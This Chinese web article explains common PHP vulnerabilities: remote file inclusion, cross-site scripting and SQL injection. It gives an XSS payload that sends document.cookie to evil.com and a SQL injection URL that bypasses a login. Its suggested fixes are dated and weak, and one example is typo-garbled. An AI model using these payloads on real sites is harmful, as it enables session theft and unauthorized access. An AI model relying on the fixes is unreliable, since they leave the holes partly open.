频道栏目
首页 > 资讯 > 防注入 > 正文

常见的PHP安全漏洞-跨站、注入和文件包含

16-01-07        来源:[db:作者]  
收藏   我要投稿

1.include的时候要小心,要判断你本地是否有这个文件,以免造成安全漏洞。
比如:
include $module.’.php’;
?>
这里假设$module是全局变量。
这个脚本让攻击者有机会在你的服务器上执行任何的php代码,比如他在浏览器url后面加上?module=http://example.com/my就行了。当php接收到这个url的时候,脚本中的”$module”变量的值将被设置为http://example.com/my。因此当php执行include的时候就很危险了……
解决办法:关闭php.ini中的register_globals或include的时候判断一下。
if(file_exists($module.’.php’)){
include $module.’.php’;
}
?>
php.ini里面有个设置。设定open_basedir后只有指定的目录和子目录下的php脚本才会被执行。
用php读取open_basedir以外的目录或文件会报错
权限不足一般虚拟主机供应商都是设定为/tmp和/home
2.跨站运行脚本。
简单的说是攻击者可以在用户的浏览器端执行一些客户端的脚本,例如js,然后盗取用户的cookies或其他重要数据。
比如<script language=’javaScript’>document.location=?’http://evil.com/cgi-bin/cookie.cgi?f=’+document.cookie</script>
如果你点击了按钮,你本地的cookie信息将会被发送的某个人的邮箱(由此可见你想做个盗取用户信息的网站是多么容易)。
3.SQL注入
个人觉得是sql自身的灵活,易用给自己带来的负面影响。
$query “select login_id from users where user=’$user’ and pwd=’$pw’”;
mysql_query($query);
?>
比如有人这样访问http://example.com/login.php?user=admin’%20OR%20(user=”&pwd=”)%20R%20user=’你的php代码可能变成。
$query = “select login_id from user where user=’admin’ or (user = ” and pwd=”) or user=””;
mysql_query($query);
?>
可以用函数进行过滤,过滤掉(’) (“),(\)等等。


相关TAG标签
上一篇:yii 怎么改变默认的控制器
下一篇:define常量如何防止地址栏直接访问后台文件的
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站